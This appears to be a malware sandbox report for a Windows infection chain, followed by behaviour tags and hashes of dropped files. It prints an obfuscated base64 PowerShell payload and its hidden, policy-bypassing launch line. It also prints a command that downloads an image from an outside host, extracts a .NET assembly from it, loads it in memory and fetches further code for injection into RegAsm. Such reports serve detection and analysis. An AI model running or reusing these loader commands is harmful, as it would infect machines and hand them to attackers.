¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘w⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘LQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘LQBn⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BJ⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BJ⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘r⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BG⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘T⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘ZwB0⤙ ⧺ ¤ ❠ ❘Gg⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘GI⤙ ⧺ ¤ ❠ ❘YQBz⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘Ng⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘Ew⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bo⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘PQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘LQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘cgB0⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘bgBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘7⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YgBh⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘2⤙ ⧺ ¤ ❠ ❘DQ⤙ ⧺ ¤ ❠ ❘QwBv⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘ZQBU⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘B0⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘UwB1⤙ ⧺ ¤ ❠ ❘GI⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘aQBu⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘K⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BJ⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘L⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YgBh⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘2⤙ ⧺ ¤ ❠ ❘DQ⤙ ⧺ ¤ ❠ ❘T⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘ZwB0⤙ ⧺ ¤ ❠ ❘Gg⤙ ⧺ ¤ ❠ ❘KQ⤙ ⧺ ¤ ❠ ❘7⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YwBv⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BC⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘WwBT⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘EM⤙ ⧺ ¤ ❠ ❘bwBu⤙ ⧺ ¤ ❠ ❘HY⤙ ⧺ ¤ ❠ ❘ZQBy⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘XQ⤙ ⧺ ¤ ❠ ❘6⤙ ⧺ ¤ ❠ ❘Do⤙ ⧺ ¤ ❠ ❘RgBy⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘bQBC⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘cwBl⤙ ⧺ ¤ ❠ ❘DY⤙ ⧺ ¤ ❠ ❘N⤙ ⧺ ¤ ❠ ❘BT⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘cgBp⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Zw⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YgBh⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘2⤙ ⧺ ¤ ❠ ❘DQ⤙ ⧺ ¤ ❠ ❘QwBv⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘Ds⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bs⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘YQBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BB⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘cwBl⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YgBs⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘WwBT⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘FI⤙ ⧺ ¤ ❠ ❘ZQBm⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘ZQBj⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘aQBv⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘LgBB⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘cwBl⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YgBs⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘XQ⤙ ⧺ ¤ ❠ ❘6⤙ ⧺ ¤ ❠ ❘Do⤙ ⧺ ¤ ❠ ❘T⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YwBv⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BC⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘KQ⤙ ⧺ ¤ ❠ ❘7⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘B5⤙ ⧺ ¤ ❠ ❘H⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘bwBh⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQBk⤙ ⧺ ¤ ❠ ❘EE⤙ ⧺ ¤ ❠ ❘cwBz⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQBi⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘eQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Ec⤙ ⧺ ¤ ❠ ❘ZQB0⤙ ⧺ ¤ ❠ ❘FQ⤙ ⧺ ¤ ❠ ❘eQBw⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘K⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘n⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘bgBs⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘Yg⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘Tw⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Eg⤙ ⧺ ¤ ❠ ❘bwBt⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘Jw⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘Ds⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bt⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bo⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘eQBw⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘LgBH⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BN⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bo⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘VgBB⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘Jw⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘HY⤙ ⧺ ¤ ❠ ❘bwBr⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘K⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘dQBs⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘L⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘Fs⤙ ⧺ ¤ ❠ ❘bwBi⤙ ⧺ ¤ ❠ ❘Go⤙ ⧺ ¤ ❠ ❘ZQBj⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘WwBd⤙ ⧺ ¤ ❠ ❘F0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘B4⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘LgBG⤙ ⧺ ¤ ❠ ❘EQ⤙ ⧺ ¤ ❠ ❘Vw⤙ ⧺ ¤ ❠ ❘v⤙ ⧺ ¤ ❠ ❘HU⤙ ⧺ ¤ ❠ ❘ZQBt⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘c⤙ ⧺ ¤ ❠ ❘Bw⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQB4⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘NQ⤙ ⧺ ¤ ❠ ❘1⤙ ⧺ ¤ ❠ ❘DE⤙ ⧺ ¤ ❠ ❘Lg⤙ ⧺ ¤ ❠ ❘z⤙ ⧺ ¤ ❠ ❘Dk⤙ ⧺ ¤ ❠ ❘MQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘DM⤙ ⧺ ¤ ❠ ❘Lg⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘Dk⤙ ⧺ ¤ ❠ ❘MQ⤙ ⧺ ¤ ❠ ❘v⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘OgBw⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bo⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘s⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘JwBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘cwBh⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘aQB2⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘s⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘JwBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘cwBh⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘aQB2⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘s⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘JwBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘cwBh⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘aQB2⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘L⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘n⤙ ⧺ ¤ ❠ ❘FI⤙ ⧺ ¤ ❠ ❘ZQBn⤙ ⧺ ¤ ❠ ❘EE⤙ ⧺ ¤ ❠ ❘cwBt⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘L⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘n⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘KQ⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤙ ⧺ ¤ ❠ ❘','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDW/uem/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3696
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
6KB
MD56f306c3029b23dc24efa15546fc1c871
SHA1880e190f6be10bce53d18023e38073802374d26a
SHA2565257c87d13a7341deb7c22d338bd0d993067138fee5c735db2c327a3d0632f88
SHA512b8744ce53ad0729b831cde82343527b9684c98c76690fb018c7d32c7dcc5a611e933530fa610bb996667799de70e65a75aa825dded03946011feaf296d56cc99
-
Filesize
19KB
MD50325996a50d2c860076adee4de979bbb
SHA195f6b4f7c0369af8649f2f5d0bb2175e1540214f
SHA25694ddf7d426c34d2a6a941cf808c5aae16c17eb72c51368e80ad5e9cb067b10ae
SHA512a4e450995df6c6e11b2f9eafc31325bdd71692548046fa11b30a832847a19750f14abe23801029db98678ebb8ed125b10a255867854e133c5506dfa3aba78490
-
Filesize
3KB
MD51dce3a91914eeb50404d3533ac67eff2
SHA1b1ce4df53dab83fd6136029a563eddd65b82f327
SHA256c35bf396c797859d4410666316ef1bdc72eb0622b5f3ba3b5676c5ce8eecb002
SHA51236347b0631f14c8a2206da44767608b51268331503304784cd88b8bb78f323ca07b1bca8d94798eedb325c76483fbc68fde81d00c1cb43ebc2d696e243a61341
-
Filesize
1KB
MD5094f7c750809978ce4cc7a850131b22f
SHA1a4918a236fc3f802d29828a863efb74be9ac8f76
SHA25610d85c12852783dd4b675d05c255bf6fd300c5dc5425ebbf4cdca5eea2cbaf5b
SHA512f6447c9594bb34c14af8150945562a4e439d09dda5241d0ed5dfd58447bef3ba9b951021b3171e77b3539a24c1243231b6aa80b8b4fa0080fa1b17dd1bbd5cd1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
178KB
MD52d27a0bd722c6d90ffaf96bc5d13a221
SHA1370c2797149c7a464736e1050a6938ff7ee28182
SHA256f8cb30a8967777e0a08a3ec434600c5d6585140769eab1faf6de9b118934817a
SHA5125233909650d26ad19b4299d8c9363a66b390e319e61b7a33ac8422819e39efc9d09390d68ecb0ce97b33ee417239a85aee058b5beb5992aea671bf591fe4712f
-
Filesize
463B
MD5e61a70cd7f2f76bc31cfb5d74d0078be
SHA1978d2901147a8ace467d19e812addd39a260d1a0
SHA2565eabc9f6f6cfad951ba0df6d7cecd689f6c2a2d272d5dc644b37aab318168d87
SHA5128bc8f7028ee578505f50bde6be3fef24807bcd68c4cd6fec6165c6b6765eaf50ab2065d9ea9ac39eeb8f62046ddc778e623a150d07b74dd58f59231f63dde189
-
Filesize
369B
MD50677ea6bee5f11cbe9439ed05401f71a
SHA17be45015d107973cd8754dc12fc909aee837116d
SHA256a1f7964127c6e98027769e7192450ce1c4c6bec09be4c917d06567188732291c
SHA512fe390d6f4bd371c4381508bed3d3f248f64c8506eacd1e577a9de8bcc91a5a6ba4eaaadc8a99b241d89f0b06c142bf1397d909229c1696f549f49ce08957ecdc
-
Filesize
652B
MD52a0cd896d2a6809da60706b029ccb495
SHA125af7790d63f38f2367d9d5d6863a907d6f82444
SHA2568aa45faf08d446470f6e5729609feb26568a253cbfd90ab24c88637c22316326
SHA512d758a2d42c0847af60167cde5a624b1ea33ee00050f0034476276c965fd759df0c49e4d3e5643376506618a8f37164af0c816d157ab0707e7842b4e16fd49039